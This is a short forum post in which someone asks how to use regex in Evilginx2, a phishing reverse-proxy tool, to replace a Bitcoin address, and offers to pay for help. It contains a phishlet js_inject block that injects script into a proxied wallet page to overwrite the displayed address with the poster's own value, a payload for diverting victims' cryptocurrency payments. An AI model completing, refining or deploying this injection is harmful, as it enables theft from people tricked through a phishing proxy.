How do i use regex to replace text on Evilgenx2 ?? Im looking to replace BTC Address.
Im happy to pay anyone who can help!!!
Im happy to pay anyone who can help!!!
js_inject:
- trigger_domains: ["www.youdomain.com"]
trigger_paths: ["/you/wallet/uri"]
script: |
function change_address(){
document.querySelector("#current_addr_selector").textContent = "new_addr_value"
}